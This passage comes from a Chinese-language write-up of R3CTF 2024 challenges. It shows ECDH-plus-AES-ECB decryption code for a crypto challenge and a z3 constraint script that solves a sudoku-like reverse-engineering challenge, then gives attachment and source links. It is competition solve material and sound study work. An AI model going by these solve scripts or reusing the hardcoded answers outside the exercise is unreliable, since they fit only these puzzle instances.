            y3 = (l * (x1 - x3) - y1) % self.p
            return x3, y3

    def mul(self, n , P):
        Q = P
        R = (0, 0)
        while (n > 0):
            if (n % 2 == 1):
                R = self.add(R, Q)
            Q = self.add(Q, Q)
            n = n // 2
        return R

class ECDH:
    def __init__(self):
        self.curve = Curve()
        self.private_key = Bob_pri
        self.public_key  = self.curve.mul(self.private_key, self.curve.G)
    def exchange_key(self,publickey):
        return md5(str(self.curve.mul(self.private_key,publickey)).encode()).digest()

def enc(msg,key):
    aes = AES.new(key,AES.MODE_ECB)
    return aes.decrypt(msg)

pub = (int(Alice_pub[:64],16),int(Alice_pub[64:],16))
K = ECDH()
key = K.exchange_key(pub)

m = enc(long_to_bytes(int(c,16)),key)
print(m)

七、Re

1.leannum

第一个输入要求81个字符

高度怀疑需要全数字

本着做传统数独的规则，怀疑是81个1到9之间。

一组输入疑似会*2+1

012345678?

这语言疑似先天就会*2+1???

6	*	1	*	*	*	*	*	*
*	*	*	*	*	*	*	*	*
*	*	*	*	5	*	*	*	*
4	*	5	*	2	*	*	*	*
*	*	*	*	*	*	0	2	*
*	*	*	*	*	*	7	*	5
*	3	*	*	*	*	4	*	*
*	*	7	4	*	1	*	*	*
*	4	*	*	*	*	*	*	*

6	0	1	2	3	4	5	7	8
2	5	3	0	7	8	1	4	6
7	8	4	1	5	6	2	0	3
4	6	5	7	2	0	3	8	1
3	7	8	6	1	5	0	2	4
0	1	2	8	4	3	7	6	5
8	3	0	5	6	2	4	1	7
5	2	7	4	8	1	6	3	0
1	4	6	3	0	7	8	5	2

from z3 import *

# 创建一个 9x9 的矩阵，表示数独的每一个单元格
X = [[Int(f'x_{i+1}_{j+1}') for j in range(9)] for i in range(9)]

# 每个单元格的值在 1 到 9 之间
cells_c = [And(X[i][j] >= 0, X[i][j] <= 8) for i in range(9) for j in range(9)]

# 每一行的值互不相同
rows_c = [Distinct(X[i]) for i in range(9)]

# 每一列的值互不相同
cols_c = [Distinct([X[i][j] for i in range(9)]) for j in range(9)]

# 每一个 3x3 子宫格的值互不相同
sq_c = [Distinct([X[3*i0 + i][3*j0 + j] for i in range(3) for j in range(3)])
        for i0 in range(3) for j0 in range(3)]

# 对角线的值互不相同
diag1_c = [Distinct([X[i][i] for i in range(9)])]
diag2_c = [Distinct([X[i][8-i] for i in range(9)])]

diag3_c = [Distinct([X[i][(i+1)%9] for i in range(9)])]
diag4_c = [Distinct([X[i][(i+2)%9] for i in range(9)])]
diag5_c = [Distinct([X[i][(i+3)%9] for i in range(9)])]
diag6_c = [Distinct([X[i][(i+4)%9] for i in range(9)])]
diag7_c = [Distinct([X[i][(i+5)%9] for i in range(9)])]
diag8_c = [Distinct([X[i][(i+6)%9] for i in range(9)])]
diag9_c = [Distinct([X[i][(i+7)%9] for i in range(9)])]
diag10_c = [Distinct([X[i][(i+8)%9] for i in range(9)])]

# 合并所有约束
sudoku_c = cells_c + rows_c + cols_c 
# sudoku_c += sq_c
sudoku_c += diag1_c
# sudoku_c += diag2_c
sudoku_c += diag3_c + diag4_c + diag5_c + diag6_c + diag7_c + diag8_c + diag9_c + diag10_c

# 创建求解器
s = Solver()
s.add(sudoku_c)

# 例如添加一些初始值（可以根据具体问题设置）
initial_values = [
    (0,0,6),
    (0,2,1),
    (2,4,5),
    (3,0,4),
    (3,2,5),
    (3,4,2),
    (4,6,0),
    (4,7,2),
    (5,6,7),
    (5,8,5),
    (6,1,3),
    (6,6,4),
    (7,2,7),
    (7,3,4),
    (7,5,1),
    (8,1,4)
]

for (i, j, v) in initial_values:
    s.add(X[i][j] == v)

# 求解数独
if s.check() == sat:
    m = s.model()
    r = [[m.evaluate(X[i][j]) for j in range(9)] for i in range(9)]
    for row in r:
        print(row)
        # for a in row:
        #     print(a,end='')
        # print()
    for row in r:
        for a in row:
            print(a,end='')

else:
    print("No solution found")

#651708243714865302320654871485327160576183024168042735832570416207431658043216587

附件题目下载地址：

链接: https://pan.baidu.com/s/1B6Da1iVGnnpDTIMk1YLOBg 提取码: r7s2 

转自原文参考连接地址：
 https://blog.xmcve.com/2024/06/12/R3CTF-2024-Writeup/#title-11
 https://w3nx1z1.github.io/2024/06/11/R3CTF/index.html
https://mnihyc.com/blog/archives/1814#r3php
https://mp.weixin.qq.com/s/ruD0Cia6EvvUqm3cEiPVIg
 https://mp.weixin.qq.com/s?__biz=MzIzMTc1MjExOQ==&mid=2247510491&idx=1&sn=50f52cd40e82f4c9716fa3dfb59c1d65&chksm=e90d575e2f6210e13b52cb552dc0fac0db8015931d6a44613f42dea50f908ffca47a7d36f66d&scene=27&key=6a21674f81640fcfff77daf657609278ce123a44ba2b0ba5dba27a0a57b46c5d8d9113d2c6af588b0b1d1c76a16e971cb8cd8af449802cd37ca86d16cd63291fb1474fa77eb3b85c2a03a251b2b9273e0f0266a82d169f093e5559ffe4451e3ed15b643584a4abb2808240af9e7fdfbc0243a0a456a4b3a0eef1d0cf553eb26d&ascene=0&uin=MjM2NjMzNTUwNA%3D%3D&devicetype=Windows+10+x64&version=63060012&lang=zh_CN&countrycode=BJ&exportkey=n_ChQIAhIQtjYI3cmCOWfQoZIAavSufBLmAQIE97dBBAEAAAAAAEr%2FKZE8dsAAAAAOpnltbLcz9gKNyK89dVj0fmOxQwDYgwOje9oppFeFvcAPkf5lCy5OuuKWyDJeegJNPhqSn46Hd2yCqjUtdGkJAQIqZokyO0qwr1pMNklOj5ATl6VSL%2F0izltwX1FwaTBB9t5q6GXdNY9z0CzJ8x9fdSd%2FCIF2stLAHsddB8V8C31gENSq4nx3MbpyEdofRHkOwJNnT%2F%2BQULoLkrUQFtP%2F6gsX4Y%2Fdis0Rt1gAVNlwByjNR6RDRkczfSwubAeI3mvCBwMW7V2vun8lnacijry5&acctmode=0&pass_ticket=zAKnOI2l5RL425wYcWJK79Mxuv1zxovjJSxjQSC59SsMnFxwXjbOH9RFtw68xGYi&wx_header=0&fontgear=2